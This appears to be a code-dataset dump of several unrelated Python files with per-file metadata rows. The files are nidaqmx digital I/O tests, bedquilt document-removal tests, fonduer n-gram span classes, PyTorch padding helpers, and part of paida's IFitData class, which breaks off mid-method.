                    line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [int(random.getrandbits(d.do_port_width)) for d in do_ports],
                dtype=numpy.uint32)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)

            writer.write_one_sample_port_uint32(values_to_test)
            time.sleep(0.001)

            values_read = numpy.zeros(number_of_channels, dtype=numpy.uint32)
            reader.read_one_sample_port_uint32(values_read)

            numpy.testing.assert_array_equal(values_read, values_to_test)

    @pytest.mark.skipif(
        len([d for d in x_series_device().do_ports
             if d.do_port_width <= 8]) < 2,
        reason="Requires 2 digital ports with at most 8 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_many_sample_port_byte(self, x_series_device, seed):
        """Stream many byte-wide samples across multiple ports."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_samples = random.randint(2, 20)
        all_ports = [d for d in x_series_device.do_ports if
                     d.do_port_width <= 8]
        number_of_channels = random.randint(2, len(all_ports))
        do_ports = random.sample(all_ports, number_of_channels)

        with nidaqmx.Task() as task:
            for do_port in do_ports:
                task.do_channels.add_do_chan(
                    do_port.name,
                    line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [[int(random.getrandbits(do_port.do_port_width))
                  for _ in range(number_of_samples)] for do_port in do_ports],
                dtype=numpy.uint8)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)
            task.start()

            writer.write_many_sample_port_byte(values_to_test)
            time.sleep(0.001)

            # Since we're writing to and reading from ONLY the digital
            # output lines, we can't use sample clocks to correlate the
            # read and write sampling times. Thus, we essentially read
            # the last value written multiple times.
            values_read = numpy.zeros(
                (number_of_channels, number_of_samples), dtype=numpy.uint8)
            reader.read_many_sample_port_byte(
                values_read, number_of_samples_per_channel=number_of_samples)

            expected_values = [
                [values_to_test[i, -1] for _ in range(number_of_samples)]
                for i in range(number_of_channels)]
            numpy.testing.assert_array_equal(values_read, expected_values)

    @pytest.mark.skipif(
        len([d for d in x_series_device().do_ports
             if d.do_port_width <= 16]) < 2,
        reason="Requires 2 digital ports with at most 16 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_many_sample_port_uint16(self, x_series_device, seed):
        """Stream many uint16-wide samples across multiple ports."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_samples = random.randint(2, 20)
        all_ports = [d for d in x_series_device.do_ports if
                     d.do_port_width <= 16]
        number_of_channels = random.randint(2, len(all_ports))
        do_ports = random.sample(all_ports, number_of_channels)

        with nidaqmx.Task() as task:
            for do_port in do_ports:
                task.do_channels.add_do_chan(
                    do_port.name,
                    line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [[int(random.getrandbits(do_port.do_port_width))
                  for _ in range(number_of_samples)] for do_port in do_ports],
                dtype=numpy.uint16)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)
            task.start()

            writer.write_many_sample_port_uint16(values_to_test)
            time.sleep(0.001)

            # Since we're writing to and reading from ONLY the digital
            # output lines, we can't use sample clocks to correlate the
            # read and write sampling times. Thus, we essentially read
            # the last value written multiple times.
            values_read = numpy.zeros(
                (number_of_channels, number_of_samples), dtype=numpy.uint16)
            reader.read_many_sample_port_uint16(
                values_read, number_of_samples_per_channel=number_of_samples)

            expected_values = [
                [values_to_test[i, -1] for _ in range(number_of_samples)]
                for i in range(number_of_channels)]
            numpy.testing.assert_array_equal(values_read, expected_values)

    @pytest.mark.skipif(
        len([d for d in x_series_device().do_ports
             if d.do_port_width <= 32]) < 2,
        reason="Requires 2 digital ports with at most 32 lines.")
    @pytest.mark.parametrize('seed', [generate_random_seed()])
    def test_many_sample_port_uint32(self, x_series_device, seed):
        """Stream many uint32-wide samples across multiple ports."""
        # Reset the pseudorandom number generator with seed.
        random.seed(seed)

        number_of_samples = random.randint(2, 20)
        all_ports = [d for d in x_series_device.do_ports if
                     d.do_port_width <= 32]
        number_of_channels = random.randint(2, len(all_ports))
        do_ports = random.sample(all_ports, number_of_channels)

        with nidaqmx.Task() as task:
            for do_port in do_ports:
                task.do_channels.add_do_chan(
                    do_port.name,
                    line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)

            # Generate random values to test.
            values_to_test = numpy.array(
                [[int(random.getrandbits(do_port.do_port_width))
                  for _ in range(number_of_samples)] for do_port in do_ports],
                dtype=numpy.uint32)

            writer = DigitalMultiChannelWriter(task.out_stream)
            reader = DigitalMultiChannelReader(task.in_stream)
            task.start()

            writer.write_many_sample_port_uint32(values_to_test)
            time.sleep(0.001)

            # Since we're writing to and reading from ONLY the digital
            # output lines, we can't use sample clocks to correlate the
            # read and write sampling times. Thus, we essentially read
            # the last value written multiple times.
            values_read = numpy.zeros(
                (number_of_channels, number_of_samples), dtype=numpy.uint32)
            reader.read_many_sample_port_uint32(
                values_read, number_of_samples_per_channel=number_of_samples)

            expected_values = [
                [values_to_test[i, -1] for _ in range(number_of_samples)]
                for i in range(number_of_channels)]
            numpy.testing.assert_array_equal(values_read, expected_values)
| 42.279294
| 78
| 0.648709
| 3,393
| 26,340
| 4.728264
| 0.046272
| 0.026928
| 0.047871
| 0.028985
| 0.955183
| 0.952877
| 0.939974
| 0.931933
| 0.929627
| 0.926323
| 0
| 0.013697
| 0.273804
| 26,340
| 622
| 79
| 42.347267
| 0.825021
| 0.116363
| 0
| 0.825243
| 0
| 0
| 0.02616
| 0
| 0
| 0
| 0
| 0
| 0.038835
| 1
| 0.038835
| false
| 0
| 0.029126
| 0
| 0.072816
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
992bce62bae104c54b56a1b18bb10eb1fb319093
| 12,413
|
py
|
Python
|
test/test_remove_documents.py
|
ShaneKilkelly/bedquilt
|
beaee513a015ed0dd633b738517b33eb7c4c42a3
|
[
"MIT"
] | 288
|
2015-04-20T18:14:39.000Z
|
2021-10-30T01:35:44.000Z
|
test/test_remove_documents.py
|
ShaneKilkelly/bedquilt
|
beaee513a015ed0dd633b738517b33eb7c4c42a3
|
[
"MIT"
] | 21
|
2015-04-13T12:48:40.000Z
|
2017-05-27T12:41:10.000Z
|
test/test_remove_documents.py
|
ShaneKilkelly/bedquilt
|
beaee513a015ed0dd633b738517b33eb7c4c42a3
|
[
"MIT"
] | 19
|
2015-11-03T09:25:00.000Z
|
2021-05-01T00:28:02.000Z
|
import testutils
import json
import string
import psycopg2
class TestRemoveDocumnts(testutils.BedquiltTestCase):
def test_remove_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_one_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove_one('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_one_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove_one('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_hitting_single_document(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
self.cur.execute("""
select bq_remove('people', '{"age": 34}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(mike,),
(jill,),
(darren,)
])
def test_remove_hitting_many_document(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
self.cur.execute("""
select bq_remove('people', '{"age": 32}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(2,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(darren,)
])
def test_remove_one_documents(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
# remove_one a single document matching a wide query
self.cur.execute("""
select bq_remove_one('people', '{"age": 32}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(jill,),
(darren,)
])
# remove_one a single document matching a specific query
self.cur.execute("""
select bq_remove_one('people', '{"name": "Darren"}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(jill,)
])
# remove_one a single document matching an _id
self.cur.execute("""
select bq_remove_one('people', '{"_id": "jill@example.com"}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,)
])
def test_remove_one_by_id_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove_one_by_id('people', 'jill@example.com');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_one_by_id_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove_one_by_id('people', 'jill@example.com');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_one_by_id(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
# remove an existing document
self.cur.execute("""
select bq_remove_one_by_id('people', 'jill@example.com')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(mike,),
(darren,)
])
# remove a document which is not in collection
self.cur.execute("""
select bq_remove_one_by_id('people', 'xxxxx')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(mike,),
(darren,)
])
def test_remove_many_by_ids_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove_many_by_ids('people', '["one", "three"]');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_many_by_ids_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove_many_by_ids('people', '["one", "three"]');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_many_by_ids(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
self.cur.execute("""
select bq_remove_many_by_ids('people', '["nope", "nope_two"]')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
self.cur.execute("""
select bq_count('people', '{}')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (4,) ])
self.cur.execute("""
select bq_remove_many_by_ids('people', '["darren@example.com", "mike@example.com"]')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (2,) ])
self.cur.execute("""
select bq_count('people', '{}')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (2,) ])
self.cur.execute("""
select bq_find('people', '{}')
""")
result = self.cur.fetchall()
self.assertEqual(
map(lambda r: r[0]['_id'], result),
['sarah@example.com', 'jill@example.com'])
| 30.42402
| 92
| 0.418916
| 1,035
| 12,413
| 4.846377
| 0.077295
| 0.086523
| 0.086523
| 0.123604
| 0.927233
| 0.927233
| 0.920853
| 0.91248
| 0.891946
| 0.874402
| 0
| 0.009115
| 0.425522
| 12,413
| 407
| 93
| 30.498772
| 0.694293
| 0.017965
| 0
| 0.846377
| 0
| 0
| 0.26067
| 0.044731
| 0
| 0
| 0
| 0
| 0.078261
| 1
| 0.037681
| false
| 0
| 0.011594
| 0
| 0.052174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
993d9997a490057a2a0060e5e439dc1789e8136a
| 3,496
|
py
|
Python
|
tutorials/organic_synthesis_figures/organic_spaces.py
|
leewaymay/839_fonduer
|
1692f018ef113d88dca4ede69cc2ead55b7b1003
|
[
"Apache-2.0"
] | 1
|
2018-05-31T02:44:00.000Z
|
2018-05-31T02:44:00.000Z
|
tutorials/organic_synthesis_figures/organic_spaces.py
|
leewaymay/839_fonduer
|
1692f018ef113d88dca4ede69cc2ead55b7b1003
|
[
"Apache-2.0"
] | null | null | null |
tutorials/organic_synthesis_figures/organic_spaces.py
|
leewaymay/839_fonduer
|
1692f018ef113d88dca4ede69cc2ead55b7b1003
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
from builtins import chr
from builtins import str
from builtins import range
from difflib import SequenceMatcher
import re
from fonduer.candidates import OmniNgrams
from fonduer.models import TemporaryImplicitSpan
class OmniNgramsProd(OmniNgrams):
    """OmniNgrams variant that re-emits each candidate span as a
    TemporaryImplicitSpan whose token-level attributes come from the
    span's LAST token only."""

    def __init__(self,
                 parts_by_doc=None,
                 n_max=1,
                 expand=False,
                 split_tokens=' '):
        """:param parts_by_doc: a dictionary d where d[document_name.upper()] = [partA, partB, ...]"""
        # NOTE(review): the `split_tokens` and `expand` arguments are
        # accepted but never forwarded -- the parent is always initialised
        # with split_tokens=' '. Confirm whether this is intentional.
        OmniNgrams.__init__(self, n_max=n_max, split_tokens=' ')
        self.parts_by_doc = parts_by_doc
        # Identity expander; not referenced in this class -- presumably
        # consumed by callers elsewhere. TODO confirm.
        self.expander = lambda x: [x]

    def apply(self, session, context):
        """Yield a TemporaryImplicitSpan for every span produced by the
        parent OmniNgrams.apply()."""
        for ts in OmniNgrams.apply(self, session, context):
            value = ts.get_span()
            yield TemporaryImplicitSpan(
                sentence=ts.sentence,
                char_start=ts.char_start,
                char_end=ts.char_end,
                expander_key=u'prod_expander',
                position=0,
                text=value,
                words=[value],
                lemmas=[value],
                # tags are taken from the last token of the span
                pos_tags=[ts.get_attrib_tokens('pos_tags')[-1]],
                ner_tags=[ts.get_attrib_tokens('ner_tags')[-1]],
                dep_parents=[ts.get_attrib_tokens('dep_parents')[-1]],
                dep_labels=[ts.get_attrib_tokens('dep_labels')[-1]],
                # visual coordinates only exist when the sentence carries
                # visual information; otherwise a [None] placeholder is used
                page=[ts.get_attrib_tokens('page')[-1]]
                if ts.sentence.is_visual() else [None],
                top=[ts.get_attrib_tokens('top')[-1]]
                if ts.sentence.is_visual() else [None],
                left=[ts.get_attrib_tokens('left')[-1]]
                if ts.sentence.is_visual() else [None],
                bottom=[ts.get_attrib_tokens('bottom')[-1]]
                if ts.sentence.is_visual() else [None],
                right=[ts.get_attrib_tokens('right')[-1]]
                if ts.sentence.is_visual() else [None],
                meta=None)
# Added by Wei Li
class OmniNgramsOrganic(OmniNgrams):
    """OmniNgrams variant that wraps every candidate span in a
    TemporaryImplicitSpan carrying the last token's attributes."""

    def apply(self, session, context):
        """Yield a TemporaryImplicitSpan for each span from the parent
        OmniNgrams.apply()."""
        for ts in OmniNgrams.apply(self, session, context):
            span_text = ts.get_span()

            def last_token(attrib):
                # single-element list holding the span's last token attribute
                return [ts.get_attrib_tokens(attrib)[-1]]

            def visual_attr(attrib):
                # visual coordinates only exist for visual sentences
                return last_token(attrib) if ts.sentence.is_visual() else [None]

            yield TemporaryImplicitSpan(
                sentence=ts.sentence,
                char_start=ts.char_start,
                char_end=ts.char_end,
                expander_key=u'N/A',
                position=0,
                text=span_text,
                words=[span_text],
                lemmas=[span_text],
                pos_tags=last_token('pos_tags'),
                ner_tags=last_token('ner_tags'),
                dep_parents=last_token('dep_parents'),
                dep_labels=last_token('dep_labels'),
                page=visual_attr('page'),
                top=visual_attr('top'),
                left=visual_attr('left'),
                bottom=visual_attr('bottom'),
                right=visual_attr('right'),
                meta=None)
| 42.120482
| 102
| 0.556064
| 417
| 3,496
| 4.386091
| 0.215827
| 0.054675
| 0.108256
| 0.167305
| 0.730454
| 0.730454
| 0.730454
| 0.730454
| 0.730454
| 0.689995
| 0
| 0.009236
| 0.31865
| 3,496
| 82
| 103
| 42.634146
| 0.758606
| 0.061499
| 0
| 0.722222
| 0
| 0
| 0.041552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.111111
| 0
| 0.180556
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
995b110980d3af59c9919d34412586d5ee92b8b4
| 1,565
|
py
|
Python
|
src/layers/padding.py
|
uw-bionlp/ards
|
e9fc27f7034cc6b54f0ccdba4a58377948cf0258
|
[
"BSD-3-Clause"
] | null | null | null |
src/layers/padding.py
|
uw-bionlp/ards
|
e9fc27f7034cc6b54f0ccdba4a58377948cf0258
|
[
"BSD-3-Clause"
] | null | null | null |
src/layers/padding.py
|
uw-bionlp/ards
|
e9fc27f7034cc6b54f0ccdba4a58377948cf0258
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
import logging
from torch.nn import ConstantPad3d, ConstantPad2d, ConstantPad1d
def pad3D(x, max_seq_count):
    '''
    Pad or truncate the first dimension (sequence count) of a 3D document
    tensor so it is exactly max_seq_count long. Padding entries are zeros
    appended at the back; excess entries are dropped from the back.
    '''
    current = x.shape[0]
    if current > max_seq_count:
        # too many sequences: keep only the first max_seq_count
        return x[:max_seq_count]
    if current < max_seq_count:
        # too few sequences: append zero-filled entries along dim 0
        return ConstantPad3d((0, 0, 0, 0, 0, max_seq_count - current), 0)(x)
    return x
def pad2D(x, max_seq_count):
    '''
    Pad or truncate the first dimension (sequence count) of a 2D document
    tensor so it is exactly max_seq_count long. Padding entries are zeros
    appended at the back; excess entries are dropped from the back.
    '''
    current = x.shape[0]
    if current > max_seq_count:
        # too many sequences: keep only the first max_seq_count
        return x[:max_seq_count]
    if current < max_seq_count:
        # too few sequences: append zero-filled rows along dim 0
        return ConstantPad2d((0, 0, 0, max_seq_count - current), 0)(x)
    return x
def pad1D(x, max_seq_count):
    '''
    Pad or truncate the first dimension (sequence count) of a 1D document
    tensor so it is exactly max_seq_count long. Padding entries are zeros
    appended at the back; excess entries are dropped from the back.
    '''
    current = x.shape[0]
    if current > max_seq_count:
        # too many sequences: keep only the first max_seq_count
        return x[:max_seq_count]
    if current < max_seq_count:
        # too few sequences: append zeros along dim 0
        return ConstantPad1d((0, max_seq_count - current), 0)(x)
    return x
| 23.014706
| 65
| 0.607029
| 212
| 1,565
| 4.254717
| 0.174528
| 0.239468
| 0.182927
| 0.079823
| 0.845898
| 0.845898
| 0.845898
| 0.845898
| 0.845898
| 0.845898
| 0
| 0.022243
| 0.310543
| 1,565
| 67
| 66
| 23.358209
| 0.813716
| 0.251118
| 0
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
41d134ec886e3474471ede005be82ee6c61fb0ef
| 16,652
|
py
|
Python
|
paida-3.2.1_2.10.1/paida/paida_core/IFitData.py
|
AshleyChraya/HubbleConstant-ConstraintsForVCG
|
634c15d296147ec1cdc3c92af1fbbfeb17844586
|
[
"MIT"
] | null | null | null |
paida-3.2.1_2.10.1/paida/paida_core/IFitData.py
|
AshleyChraya/HubbleConstant-ConstraintsForVCG
|
634c15d296147ec1cdc3c92af1fbbfeb17844586
|
[
"MIT"
] | null | null | null |
paida-3.2.1_2.10.1/paida/paida_core/IFitData.py
|
AshleyChraya/HubbleConstant-ConstraintsForVCG
|
634c15d296147ec1cdc3c92af1fbbfeb17844586
|
[
"MIT"
] | null | null | null |
from paida.paida_core.PAbsorber import *
from paida.paida_core.IRangeSet import *
from paida.paida_core.PExceptions import *
from paida.paida_core.IHistogram1D import *
from paida.paida_core.IHistogram2D import *
from paida.paida_core.IHistogram3D import *
from paida.paida_core.ICloud1D import *
from paida.paida_core.ICloud2D import *
from paida.paida_core.ICloud3D import *
from paida.paida_core.IProfile1D import *
from paida.paida_core.IProfile2D import *
from paida.paida_core.IDataPointSet import *
from paida.paida_core.ITuple import *
from paida.paida_core.IEvaluator import *
import paida.paida_core.PTypes as PTypes
import types
class IFitData:
    """Adapter that extracts fit points from AIDA data objects
    (histograms, clouds, profiles, data point sets, tuples) into a
    uniform internal structure [centers, weights, errorsP, errorsM],
    plus one IRangeSet per fitted dimension.

    NOTE(review): this module uses types.IntType / types.StringTypes,
    which exist only on Python 2.
    """

    def __init__(self):
        # [centers, weights, errorsP, errorsM] once connected; [] before.
        self._connection = []
        # One IRangeSet per fitted dimension.
        self._range = []
        # True for binned sources, False for unbinned; None when unset.
        self._binned = None
        self._dataDescription = ''

    def create1DConnection(self, data1, data2 = None, data3 = None):
        """Connect 1D data.

        Accepted argument patterns:
          - IHistogram1D            (binned)
          - ICloud1D                (unbinned)
          - IProfile1D              (binned)
          - IDataPointSet, xIndex, valIndex  (binned)
        Raises TypeError for anything else.
        """
        centers = []
        weights = []
        errorsP = []
        errorsM = []
        if isinstance(data1, IHistogram1D) and (data2 == None) and (data3 == None):
            self._binned = True
            histogram = data1
            xAxis = histogram.axis()
            for xBinNumber in range(xAxis.bins()):
                weight = histogram.binHeight(xBinNumber)
                if weight == 0.0:
                    # empty bin: fall back to the geometric bin center
                    xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                else:
                    xCenter = histogram.binMean(xBinNumber)
                centers.append([xCenter])
                weights.append(weight)
                # symmetric errors: same value for plus and minus
                error = histogram._binError2(xBinNumber)
                errorsP.append(error)
                errorsM.append(error)
        elif isinstance(data1, ICloud1D) and (data2 == None) and (data3 == None):
            self._binned = False
            cloud = data1
            # unbinned data carries no weights or errors
            for entryNumber in range(cloud.entries()):
                xCenter = cloud.value(entryNumber)
                centers.append([xCenter])
                weights.append(None)
                errorsP.append(None)
                errorsM.append(None)
        elif isinstance(data1, IProfile1D) and (data2 == None) and (data3 == None):
            self._binned = True
            profile = data1
            xAxis = profile.axis()
            for xBinNumber in range(xAxis.bins()):
                weight = profile.binHeight(xBinNumber)
                if weight == 0.0:
                    xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                else:
                    xCenter = profile.binMean(xBinNumber)
                centers.append([xCenter])
                weights.append(weight)
                error = profile._binError2(xBinNumber)
                errorsP.append(error)
                errorsM.append(error)
        elif isinstance(data1, IDataPointSet) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType):
            self._binned = True
            dataPointSet = data1
            xIndex = data2
            valIndex = data3
            for offset in range(dataPointSet.size()):
                dataPoint = dataPointSet.point(offset)
                x = dataPoint.coordinate(xIndex)
                y = dataPoint.coordinate(valIndex)
                centers.append([x.value()])
                weights.append(y.value())
                # asymmetric errors, squared
                errorsP.append(y.errorPlus()**2)
                errorsM.append(y.errorMinus()**2)
        else:
            raise TypeError('Invalid arguments.')
        self._connection = [centers, weights, errorsP, errorsM]
        self._range.append(IRangeSet())

    def create2DConnection(self, data1, data2 = None, data3 = None, data4 = None):
        """Connect 2D data.

        Accepted argument patterns:
          - IHistogram2D                              (binned)
          - IHistogram2D, xIndex, yIndex              (binned, axes remapped)
          - ICloud2D                                  (unbinned)
          - ICloud2D, xIndex, yIndex                  (unbinned, axes remapped)
          - IProfile2D                                (binned)
          - IProfile2D, xIndex, yIndex                (binned, axes remapped)
          - IDataPointSet, xIndex, yIndex, valIndex   (binned)
        Raises TypeError for anything else.
        """
        centers = []
        weights = []
        errorsP = []
        errorsM = []
        if isinstance(data1, IHistogram2D) and (data2 == None) and (data3 == None) and (data4 == None):
            self._binned = True
            histogram = data1
            xAxis = histogram.xAxis()
            yAxis = histogram.yAxis()
            for xBinNumber in range(xAxis.bins()):
                for yBinNumber in range(yAxis.bins()):
                    weight = histogram.binHeight(xBinNumber, yBinNumber)
                    if weight == 0.0:
                        # empty bin: geometric centers on both axes
                        xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                        yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
                    else:
                        xCenter = histogram.binMeanX(xBinNumber, yBinNumber)
                        yCenter = histogram.binMeanY(xBinNumber, yBinNumber)
                    centers.append([xCenter, yCenter])
                    weights.append(weight)
                    error = histogram._binError2(xBinNumber, yBinNumber)
                    errorsP.append(error)
                    errorsM.append(error)
        elif isinstance(data1, IHistogram2D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and (data4 == None):
            self._binned = True
            histogram = data1
            xIndex = data2
            yIndex = data3
            xAxis = histogram.xAxis()
            yAxis = histogram.yAxis()
            for xBinNumber in range(xAxis.bins()):
                for yBinNumber in range(yAxis.bins()):
                    weight = histogram.binHeight(xBinNumber, yBinNumber)
                    if weight == 0.0:
                        xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                        yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
                    else:
                        xCenter = histogram.binMeanX(xBinNumber, yBinNumber)
                        yCenter = histogram.binMeanY(xBinNumber, yBinNumber)
                    # place values at the caller-selected positions
                    center = [None, None]
                    center[xIndex] = xCenter
                    center[yIndex] = yCenter
                    centers.append(center)
                    weights.append(weight)
                    error = histogram._binError2(xBinNumber, yBinNumber)
                    errorsP.append(error)
                    errorsM.append(error)
        elif isinstance(data1, ICloud2D) and (data2 == None) and (data3 == None) and (data4 == None):
            self._binned = False
            cloud = data1
            for entryNumber in range(cloud.entries()):
                xCenter = cloud.valueX(entryNumber)
                yCenter = cloud.valueY(entryNumber)
                centers.append([xCenter, yCenter])
                weights.append(None)
                errorsP.append(None)
                errorsM.append(None)
        elif isinstance(data1, ICloud2D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and (data4 == None):
            self._binned = False
            cloud = data1
            xIndex = data2
            yIndex = data3
            for entryNumber in range(cloud.entries()):
                center = [None, None]
